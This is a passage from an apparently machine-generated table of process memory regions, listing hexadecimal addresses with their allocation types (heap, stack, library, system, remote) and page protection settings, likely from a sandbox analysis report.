page read and write
|
||
3A7000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
30B000
|
heap
|
page read and write
|
||
35C000
|
heap
|
page read and write
|
||
2C2000
|
heap
|
page read and write
|
||
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
54E000
|
heap
|
page read and write
|
||
31A2000
|
trusted library allocation
|
page read and write
|
||
3C9000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
3B75000
|
heap
|
page read and write
|
||
3B88000
|
heap
|
page read and write
|
||
164000
|
heap
|
page read and write
|
||
1DBF000
|
stack
|
page read and write
|
||
19F000
|
heap
|
page read and write
|
||
55BE000
|
heap
|
page read and write
|
||
2FF000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
2256000
|
heap
|
page read and write
|
||
4D92000
|
heap
|
page read and write
|
||
3B4B000
|
heap
|
page read and write
|
||
1AFC0000
|
heap
|
page read and write
|
||
4E4000
|
heap
|
page read and write
|
||
3EF000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
22EE000
|
stack
|
page read and write
|
||
1DF0000
|
heap
|
page execute and read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
31A000
|
heap
|
page read and write
|
||
28D0000
|
heap
|
page read and write
|
||
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
1B46000
|
heap
|
page read and write
|
||
5D18000
|
heap
|
page read and write
|
||
4D93000
|
heap
|
page read and write
|
||
25BF000
|
stack
|
page read and write
|
||
54EA000
|
heap
|
page read and write
|
||
7FE898C0000
|
trusted library allocation
|
page read and write
|
||
36EA000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
1B5AB000
|
stack
|
page read and write
|
||
55CC000
|
heap
|
page read and write
|
||
3156000
|
trusted library allocation
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
55CE000
|
heap
|
page read and write
|
||
1BA0000
|
heap
|
page read and write
|
||
15C000
|
stack
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
9556000
|
trusted library allocation
|
page read and write
|
||
5DD4000
|
heap
|
page read and write
|
||
36C5000
|
heap
|
page read and write
|
||
38C000
|
heap
|
page read and write
|
||
387000
|
heap
|
page read and write
|
||
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
408000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
50BF000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
1AF70000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
55BA000
|
heap
|
page read and write
|
||
584F000
|
trusted library allocation
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
3C00000
|
trusted library allocation
|
page read and write
|
||
1DE9000
|
stack
|
page read and write
|
||
53BC000
|
heap
|
page read and write
|
||
32A1000
|
trusted library allocation
|
page read and write
|
||
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
391000
|
heap
|
page read and write
|
||
410000
|
heap
|
page read and write
|
||
382000
|
heap
|
page read and write
|
||
37E000
|
heap
|
page read and write
|
||
2E9000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
568000
|
heap
|
page read and write
|
||
5C7E000
|
heap
|
page read and write
|
||
1AEC4000
|
heap
|
page read and write
|
||
5854000
|
trusted library allocation
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
7FE898A0000
|
trusted library allocation
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
3282000
|
trusted library allocation
|
page read and write
|
||
32EA000
|
trusted library allocation
|
page read and write
|
||
32F6000
|
trusted library allocation
|
page read and write
|
||
36B3000
|
heap
|
page read and write
|
||
2C9000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
860000
|
heap
|
page read and write
|
||
3500000
|
heap
|
page read and write
|
||
377000
|
heap
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
42B000
|
heap
|
page read and write
|
||
837000
|
heap
|
page read and write
|
||
1F7E000
|
stack
|
page read and write
|
||
1FA0000
|
heap
|
page execute and read and write
|
||
7FE89966000
|
trusted library allocation
|
page read and write
|
||
7FE89894000
|
trusted library allocation
|
page read and write
|
||
3990000
|
heap
|
page read and write
|
||
164000
|
heap
|
page read and write
|
||
5E33000
|
heap
|
page read and write
|
||
3B4B000
|
heap
|
page read and write
|
||
56D000
|
heap
|
page read and write
|
||
584F000
|
trusted library allocation
|
page read and write
|
||
3E7000
|
heap
|
page read and write
|
||
5849000
|
trusted library allocation
|
page read and write
|
||
2C0000
|
trusted library allocation
|
page read and write
|
||
527000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
472000
|
heap
|
page read and write
|
||
569A000
|
heap
|
page read and write
|
||
5526000
|
heap
|
page read and write
|
||
5336000
|
heap
|
page read and write
|
||
473000
|
heap
|
page read and write
|
||
50DC000
|
heap
|
page read and write
|
||
51DB000
|
heap
|
page read and write
|
||
413000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
53BE000
|
heap
|
page read and write
|
||
3A4F000
|
heap
|
page read and write
|
||
42B000
|
heap
|
page read and write
|
||
5694000
|
heap
|
page read and write
|
||
3C6000
|
heap
|
page read and write
|
||
4B90000
|
trusted library allocation
|
page read and write
|
||
3B63000
|
heap
|
page read and write
|
||
1F60000
|
direct allocation
|
page read and write
|
||
4D92000
|
heap
|
page read and write
|
||
32A2000
|
trusted library allocation
|
page read and write
|
||
370A000
|
heap
|
page read and write
|
||
4CF000
|
heap
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
1CA0000
|
trusted library allocation
|
page read and write
|
||
A2F000
|
stack
|
page read and write
|
||
473000
|
heap
|
page read and write
|
||
319B000
|
trusted library allocation
|
page read and write
|
||
4556000
|
trusted library allocation
|
page read and write
|
||
3B8F000
|
heap
|
page read and write
|
||
3295000
|
trusted library allocation
|
page read and write
|
||
20D000
|
heap
|
page read and write
|
||
2E6000
|
heap
|
page read and write
|
||
1B10000
|
heap
|
page read and write
|
||
36BA000
|
heap
|
page read and write
|
||
495000
|
heap
|
page read and write
|
||
31A2000
|
trusted library allocation
|
page read and write
|
||
4110000
|
trusted library allocation
|
page read and write
|
||
4030000
|
trusted library allocation
|
page read and write
|
||
26A4000
|
heap
|
page read and write
|
||
32EA000
|
trusted library allocation
|
page read and write
|
||
4E5B000
|
heap
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
5956000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3B73000
|
heap
|
page read and write
|
||
50A000
|
heap
|
page read and write
|
||
1B170000
|
heap
|
page read and write
|
||
50BE000
|
heap
|
page read and write
|
||
55BE000
|
heap
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
7FE89996000
|
trusted library allocation
|
page execute and read and write
|
||
610000
|
heap
|
page read and write
|
||
36E0000
|
heap
|
page read and write
|
||
589000
|
heap
|
page read and write
|
||
25E4000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
42B000
|
heap
|
page read and write
|
||
4E77000
|
heap
|
page read and write
|
||
3C3000
|
heap
|
page read and write
|
||
38B5000
|
heap
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
49D000
|
heap
|
page read and write
|
||
53BC000
|
heap
|
page read and write
|
||
7FE898B3000
|
trusted library allocation
|
page execute and read and write
|
||
358000
|
heap
|
page read and write
|
||
1C010000
|
heap
|
page read and write
|
||
429000
|
heap
|
page read and write
|
||
55C6000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
367000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
55CC000
|
heap
|
page read and write
|
||
3ADC000
|
heap
|
page read and write
|
||
4D92000
|
heap
|
page read and write
|
||
3C9000
|
heap
|
page read and write
|
||
1AB000
|
stack
|
page read and write
|
||
55CC000
|
heap
|
page read and write
|
||
19F50000
|
trusted library allocation
|
page read and write
|
||
51DB000
|
heap
|
page read and write
|
||
4835000
|
heap
|
page read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
36E0000
|
heap
|
page read and write
|
||
468000
|
heap
|
page read and write
|
||
519D000
|
heap
|
page read and write
|
||
3B61000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
53E7000
|
heap
|
page read and write
|
||
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
1C62C000
|
stack
|
page read and write
|
||
1ACF2000
|
heap
|
page read and write
|
||
7FE898AB000
|
trusted library allocation
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
32FD000
|
trusted library allocation
|
page read and write
|
||
2C0000
|
heap
|
page read and write
|
||
21BE000
|
stack
|
page read and write
|
||
1AAB8000
|
stack
|
page read and write
|
||
45B000
|
heap
|
page read and write
|
||
3A9E000
|
stack
|
page read and write
|
||
50C0000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
3B88000
|
heap
|
page read and write
|
||
3E2000
|
heap
|
page read and write
|
||
36FA000
|
heap
|
page read and write
|
||
3A7000
|
heap
|
page read and write
|
||
475000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
5849000
|
trusted library allocation
|
page read and write
|
||
45B000
|
heap
|
page read and write
|
||
53AB000
|
heap
|
page read and write
|
||
2E0000
|
heap
|
page read and write
|
||
55C7000
|
heap
|
page read and write
|
||
32E5000
|
trusted library allocation
|
page read and write
|
||
45F000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
2ADA000
|
stack
|
page read and write
|
||
120A0000
|
trusted library allocation
|
page read and write
|
||
566000
|
heap
|
page read and write
|
||
37E000
|
heap
|
page read and write
|
||
5699000
|
heap
|
page read and write
|
||
5DB1000
|
heap
|
page read and write
|
||
36A4000
|
heap
|
page read and write
|
||
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
57D0000
|
trusted library allocation
|
page read and write
|
||
1B277000
|
heap
|
page read and write
|
||
320000
|
heap
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
32F3000
|
trusted library allocation
|
page read and write
|
||
3F00000
|
trusted library allocation
|
page read and write
|
||
7FE89A72000
|
trusted library allocation
|
page read and write
|
||
58A0000
|
trusted library allocation
|
page read and write
|
||
32FA000
|
trusted library allocation
|
page read and write
|
||
7FE89A63000
|
trusted library allocation
|
page read and write
|
||
4710000
|
heap
|
page read and write
|
||
3279000
|
trusted library allocation
|
page read and write
|
||
1DA0000
|
heap
|
page read and write
|
||
466000
|
heap
|
page read and write
|
||
32FD000
|
trusted library allocation
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
1DD0000
|
heap
|
page read and write
|
||
411000
|
heap
|
page read and write
|
||
3B69000
|
heap
|
page read and write
|
||
3282000
|
trusted library allocation
|
page read and write
|
||
369D000
|
heap
|
page read and write
|
||
36EA000
|
heap
|
page read and write
|
||
CC000
|
stack
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
124000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
12D000
|
heap
|
page read and write
|
||
53B6000
|
heap
|
page read and write
|
||
50D6000
|
heap
|
page read and write
|
||
32F1000
|
trusted library allocation
|
page read and write
|
||
5641000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
55BA000
|
heap
|
page read and write
|
||
4A4000
|
heap
|
page read and write
|
||
5692000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
3B88000
|
heap
|
page read and write
|
||
32D8000
|
trusted library allocation
|
page read and write
|
||
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
5D8E000
|
heap
|
page read and write
|
||
55CC000
|
heap
|
page read and write
|
||
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
3683000
|
heap
|
page read and write
|
||
377000
|
heap
|
page read and write
|
||
51D5000
|
heap
|
page read and write
|
||
3E9000
|
heap
|
page read and write
|
||
562E000
|
heap
|
page read and write
|
||
4D99000
|
heap
|
page read and write
|
||
53AB000
|
heap
|
page read and write
|
||
32FA000
|
trusted library allocation
|
page read and write
|
||
584F000
|
trusted library allocation
|
page read and write
|
||
3AA0000
|
trusted library allocation
|
page read and write
|
||
164000
|
heap
|
page read and write
|
||
3AD7000
|
heap
|
page read and write
|
||
3B88000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
3A46000
|
heap
|
page read and write
|
||
5336000
|
heap
|
page read and write
|
||
2702000
|
trusted library allocation
|
page read and write
|
||
21FA000
|
heap
|
page read and write
|
||
7FE89960000
|
trusted library allocation
|
page read and write
|
||
411000
|
heap
|
page read and write
|
||
41F000
|
system
|
page execute and read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
327D000
|
trusted library allocation
|
page read and write
|
||
3705000
|
heap
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
53B4000
|
heap
|
page read and write
|
||
3A7000
|
heap
|
page read and write
|
||
51D5000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
5E7A000
|
heap
|
page read and write
|
||
2F0000
|
heap
|
page read and write
|
||
348000
|
heap
|
page read and write
|
||
1AF000
|
stack
|
page read and write
|
||
36B5000
|
heap
|
page read and write
|
||
565F000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
47D000
|
heap
|
page read and write
|
||
3B66000
|
heap
|
page read and write
|
||
1DE9000
|
stack
|
page read and write
|
||
363000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D3B000
|
heap
|
page read and write
|
||
49D000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
449000
|
heap
|
page read and write
|
||
4E03000
|
heap
|
page read and write
|
||
3B69000
|
heap
|
page read and write
|
||
472000
|
heap
|
page read and write
|
||
4FA000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
5315000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
5186000
|
heap
|
page read and write
|
||
565C000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3BA0000
|
trusted library allocation
|
page read and write
|
||
319D000
|
trusted library allocation
|
page read and write
|
||
369D000
|
heap
|
page read and write
|
||
4E2000
|
heap
|
page read and write
|
||
45A000
|
system
|
page execute and read and write
|
||
3940000
|
heap
|
page read and write
|
||
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
465000
|
heap
|
page read and write
|
||
246F000
|
stack
|
page read and write
|
||
4C8000
|
heap
|
page read and write
|
||
363000
|
heap
|
page read and write
|
||
4D8000
|
heap
|
page read and write
|
||
1C4E0000
|
heap
|
page read and write
|
||
1C540000
|
heap
|
page read and write
|
||
3ACD000
|
heap
|
page read and write
|
||
7FE89893000
|
trusted library allocation
|
page execute and read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
7FFFFF80000
|
trusted library allocation
|
page readonly
|
||
1C9000
|
heap
|
page read and write
|
||
515B000
|
heap
|
page read and write
|
||
23AE000
|
trusted library allocation
|
page read and write
|
||
1A1CD000
|
stack
|
page read and write
|
||
3E9B000
|
stack
|
page read and write
|
||
39F0000
|
heap
|
page read and write
|
||
3B7F000
|
heap
|
page read and write
|
||
55C8000
|
heap
|
page read and write
|
||
415000
|
heap
|
page read and write
|
||
4CD000
|
heap
|
page read and write
|
||
3197000
|
trusted library allocation
|
page read and write
|
||
1C4000
|
heap
|
page read and write
|
||
55BF000
|
heap
|
page read and write
|
||
5186000
|
heap
|
page read and write
|
||
3F0000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
1EC4000
|
heap
|
page read and write
|
||
4D58000
|
heap
|
page read and write
|
||
34C0000
|
trusted library allocation
|
page execute
|
||
41A000
|
heap
|
page read and write
|
||
36A5000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
129000
|
heap
|
page read and write
|
||
1AE1E000
|
stack
|
page read and write
|
||
3423000
|
trusted library allocation
|
page read and write
|
||
472000
|
heap
|
page read and write
|
||
1F06000
|
heap
|
page read and write
|
||
2B0000
|
trusted library allocation
|
page read and write
|
||
1AD5E000
|
heap
|
page read and write
|
||
3A50000
|
heap
|
page read and write
|
||
569C000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
1A5E0000
|
heap
|
page execute and read and write
|
||
2F0000
|
heap
|
page read and write
|
||
1AEC0000
|
heap
|
page read and write
|
||
7FE8989D000
|
trusted library allocation
|
page execute and read and write
|
||
4CC000
|
heap
|
page read and write
|
||
515A000
|
heap
|
page read and write
|
||
290000
|
heap
|
page read and write
|
||
50DC000
|
heap
|
page read and write
|
||
367000
|
heap
|
page read and write
|
||
3A45000
|
heap
|
page read and write
|
||
380000
|
heap
|
page read and write
|
||
1EA0000
|
direct allocation
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
2C4000
|
heap
|
page read and write
|
||
472000
|
heap
|
page read and write
|
||
36FE000
|
stack
|
page read and write
|
||
5C96000
|
heap
|
page read and write
|
||
4D99000
|
heap
|
page read and write
|
||
3156000
|
trusted library allocation
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
35A0000
|
heap
|
page read and write
|
||
472000
|
heap
|
page read and write
|
||
3B21000
|
heap
|
page read and write
|
||
1F62000
|
heap
|
page read and write
|
||
A7E000
|
stack
|
page read and write
|
||
41B000
|
heap
|
page read and write
|
||
7FFFFF81000
|
trusted library allocation
|
page execute read
|
||
22D0000
|
heap
|
page read and write
|
||
22C000
|
stack
|
page read and write
|
||
429000
|
heap
|
page read and write
|
||
4E0C000
|
heap
|
page read and write
|
||
3705000
|
heap
|
page read and write
|
||
2995000
|
heap
|
page read and write
|
||
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
36D9000
|
heap
|
page read and write
|
||
1C6D0000
|
heap
|
page read and write
|
||
4E79000
|
heap
|
page read and write
|
||
4E05000
|
heap
|
page read and write
|
||
32E8000
|
trusted library allocation
|
page read and write
|
||
32FE000
|
trusted library allocation
|
page read and write
|
||
41EC000
|
stack
|
page read and write
|
||
3FC000
|
heap
|
page read and write
|
||
4080000
|
trusted library allocation
|
page read and write
|
||
30C000
|
stack
|
page read and write
|
||
36EA000
|
heap
|
page read and write
|
||
1C245000
|
heap
|
page read and write
|
||
371B000
|
heap
|
page read and write
|
||
48F000
|
heap
|
page read and write
|
||
3273000
|
trusted library allocation
|
page read and write
|
||
58A0000
|
trusted library allocation
|
page read and write
|
||
1ACA7000
|
heap
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
52A000
|
heap
|
page read and write
|
||
224F000
|
stack
|
page read and write
|
||
1B1D3000
|
heap
|
page read and write
|
||
40C000
|
heap
|
page read and write
|
||
5C67000
|
heap
|
page read and write
|
||
42B000
|
heap
|
page read and write
|
||
7E3000
|
heap
|
page read and write
|
||
4E05000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
3BFB000
|
stack
|
page read and write
|
||
36D7000
|
heap
|
page read and write
|
||
4D98000
|
heap
|
page read and write
|
||
27C000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
51C3000
|
heap
|
page read and write
|
||
2B4E000
|
stack
|
page read and write
|
||
3A2000
|
stack
|
page read and write
|
||
3423000
|
trusted library allocation
|
page read and write
|
||
5854000
|
trusted library allocation
|
page read and write
|
||
1C9C0000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
207F000
|
stack
|
page read and write
|
||
37A000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
3285000
|
trusted library allocation
|
page read and write
|
||
3A3D000
|
heap
|
page read and write
|
||
3705000
|
heap
|
page read and write
|
||
5336000
|
heap
|
page read and write
|
||
55CC000
|
heap
|
page read and write
|
||
3719000
|
heap
|
page read and write
|
||
3B56000
|
trusted library allocation
|
page read and write
|
||
20E000
|
stack
|
page read and write
|
||
32FA000
|
trusted library allocation
|
page read and write
|
||
478000
|
heap
|
page read and write
|
||
5675000
|
heap
|
page read and write
|
||
36F4000
|
heap
|
page read and write
|
||
7FE89940000
|
trusted library allocation
|
page read and write
|
||
469000
|
heap
|
page read and write
|
||
4C00000
|
trusted library allocation
|
page read and write
|
||
7FE89A43000
|
trusted library allocation
|
page read and write
|
||
1C4CE000
|
stack
|
page read and write
|
||
1D10000
|
direct allocation
|
page read and write
|
||
3B8A000
|
heap
|
page read and write
|
||
403000
|
heap
|
page read and write
|
||
405E000
|
stack
|
page read and write
|
||
7FFFFF87000
|
trusted library allocation
|
page execute read
|
||
560000
|
trusted library allocation
|
page read and write
|
||
1C00C000
|
stack
|
page read and write
|
||
2C0000
|
heap
|
page read and write
|
||
50C9000
|
heap
|
page read and write
|
||
3A40000
|
heap
|
page read and write
|
||
4BB000
|
heap
|
page read and write
|
||
3080000
|
remote allocation
|
page read and write
|
||
1A86A000
|
stack
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
3197000
|
trusted library allocation
|
page read and write
|
||
340000
|
heap
|
page read and write
|
||
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
329E000
|
trusted library allocation
|
page read and write
|
||
52C1000
|
heap
|
page read and write
|
||
32F000
|
heap
|
page read and write
|
||
36A1000
|
heap
|
page read and write
|
||
6770000
|
trusted library allocation
|
page read and write
|
||
2D5000
|
heap
|
page read and write
|
||
5CA2000
|
heap
|
page read and write
|
||
855000
|
heap
|
page read and write
|
||
4D94000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
7756000
|
trusted library allocation
|
page read and write
|
||
3B7F000
|
heap
|
page read and write
|
||
266A000
|
trusted library allocation
|
page read and write
|
||
3B91000
|
heap
|
page read and write
|
||
1D88000
|
heap
|
page read and write
|
||
36D3000
|
heap
|
page read and write
|
||
32AE000
|
trusted library allocation
|
page read and write
|
||
517B000
|
heap
|
page read and write
|
||
3440000
|
trusted library allocation
|
page execute
|
||
53BC000
|
heap
|
page read and write
|
||
7EC000
|
heap
|
page read and write
|
||
36C5000
|
heap
|
page read and write
|
||
23EA000
|
trusted library allocation
|
page read and write
|
||
37D000
|
heap
|
page read and write
|
||
1BA4000
|
heap
|
page read and write
|
||
36C5000
|
heap
|
page read and write
|
||
410000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
3ADA000
|
heap
|
page read and write
|
||
7FE89A67000
|
trusted library allocation
|
page read and write
|
||
2703000
|
trusted library allocation
|
page read and write
|
||
4E0E000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
6770000
|
trusted library allocation
|
page read and write
|
||
21A3000
|
heap
|
page read and write
|
||
386000
|
heap
|
page read and write
|
||
7FFFFF83000
|
trusted library allocation
|
page execute read
|
||
546000
|
heap
|
page read and write
|
||
1B00000
|
trusted library allocation
|
page read and write
|
||
3B93000
|
heap
|
page read and write
|
||
4E7000
|
heap
|
page read and write
|
||
538000
|
heap
|
page read and write
|
||
5849000
|
trusted library allocation
|
page read and write
|
||
2756000
|
trusted library allocation
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
1BA0000
|
heap
|
page read and write
|
||
5854000
|
trusted library allocation
|
page read and write
|
||
38A000
|
heap
|
page read and write
|
||
1F5000
|
heap
|
page read and write
|
||
3B88000
|
heap
|
page read and write
|
||
206000
|
heap
|
page read and write
|
||
5DBD000
|
heap
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
3B8A000
|
heap
|
page read and write
|
||
140000
|
heap
|
page read and write
|
||
319B000
|
trusted library allocation
|
page read and write
|
||
32D0000
|
trusted library allocation
|
page read and write
|
||
55BF000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
566F000
|
heap
|
page read and write
|
||
311000
|
heap
|
page read and write
|
||
1A27C000
|
stack
|
page read and write
|
||
49D000
|
heap
|
page read and write
|
||
348000
|
stack
|
page read and write
|
||
31A4000
|
trusted library allocation
|
page read and write
|
||
3B91000
|
heap
|
page read and write
|
||
4D5D000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
570000
|
trusted library allocation
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
3B91000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
29D000
|
heap
|
page read and write
|
||
5DA5000
|
heap
|
page read and write
|
||
4F56000
|
trusted library allocation
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
5041000
|
heap
|
page read and write
|
||
21CF000
|
stack
|
page read and write
|
||
3B21000
|
heap
|
page read and write
|
||
566E000
|
heap
|
page read and write
|
||
566E000
|
heap
|
page read and write
|
||
3B8A000
|
heap
|
page read and write
|
||
12D000
|
heap
|
page read and write
|
||
5080000
|
heap
|
page read and write
|
||
AE3000
|
heap
|
page read and write
|
||
7FE89AA0000
|
trusted library allocation
|
page execute and read and write
|
||
3B00000
|
trusted library allocation
|
page read and write
|
||
420000
|
heap
|
page read and write
|
||
3B6000
|
heap
|
page read and write
|
||
3981000
|
heap
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
2163000
|
heap
|
page read and write
|
||
1B2AE000
|
heap
|
page read and write
|
||
7FE89A50000
|
trusted library allocation
|
page read and write
|
||
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
327F000
|
trusted library allocation
|
page read and write
|
||
26FA000
|
trusted library allocation
|
page read and write
|
||
3BA000
|
heap
|
page read and write
|
||
5940000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
50BE000
|
heap
|
page read and write
|
||
2266000
|
heap
|
page read and write
|
||
7FE89A47000
|
trusted library allocation
|
page read and write
|
||
371F000
|
heap
|
page read and write
|
||
3B7F000
|
heap
|
page read and write
|
||
3AD7000
|
heap
|
page read and write
|
||
53E7000
|
heap
|
page read and write
|
||
4CA000
|
heap
|
page read and write
|
||
55CC000
|
heap
|
page read and write
|
||
515A000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3B4C000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
3D7000
|
heap
|
page read and write
|
||
371F000
|
heap
|
page read and write
|
||
50C9000
|
heap
|
page read and write
|
||
4839000
|
heap
|
page read and write
|
||
25E000
|
heap
|
page read and write
|
||
429000
|
heap
|
page read and write
|
||
290000
|
heap
|
page read and write
|
||
253E000
|
stack
|
page read and write
|
||
55CC000
|
heap
|
page read and write
|
||
47C000
|
heap
|
page read and write
|
||
5C8A000
|
heap
|
page read and write
|
||
7FE898A3000
|
trusted library allocation
|
page read and write
|
||
278000
|
heap
|
page read and write
|
||
32DF000
|
stack
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
3B88000
|
heap
|
page read and write
|
||
3ED0000
|
trusted library allocation
|
page read and write
|
||
1CD7000
|
direct allocation
|
page read and write
|
||
32FD000
|
trusted library allocation
|
page read and write
|
||
3197000
|
trusted library allocation
|
page read and write
|
||
36F4000
|
heap
|
page read and write
|
||
445000
|
heap
|
page read and write
|
||
1AFB0000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
383F000
|
stack
|
page read and write
|
||
26A0000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
36B6000
|
heap
|
page read and write
|
||
3986000
|
heap
|
page read and write
|
||
2619000
|
trusted library allocation
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
268F000
|
stack
|
page read and write
|
||
1AE000
|
stack
|
page read and write
|
||
1AD1E000
|
heap
|
page read and write
|
||
55CC000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
3276000
|
trusted library allocation
|
page read and write
|
||
51C2000
|
heap
|
page read and write
|
||
4E5000
|
heap
|
page read and write
|
||
40D000
|
heap
|
page read and write
|
||
4D99000
|
heap
|
page read and write
|
||
1DA0000
|
heap
|
page read and write
|
||
515A000
|
heap
|
page read and write
|
||
4D97000
|
heap
|
page read and write
|
||
2E5000
|
heap
|
page read and write
|
||
38AC000
|
stack
|
page read and write
|
||
42B000
|
heap
|
page read and write
|
||
3453000
|
direct allocation
|
page read and write
|
||
42B000
|
heap
|
page read and write
|
||
1E90000
|
heap
|
page read and write
|
||
2291000
|
trusted library allocation
|
page read and write
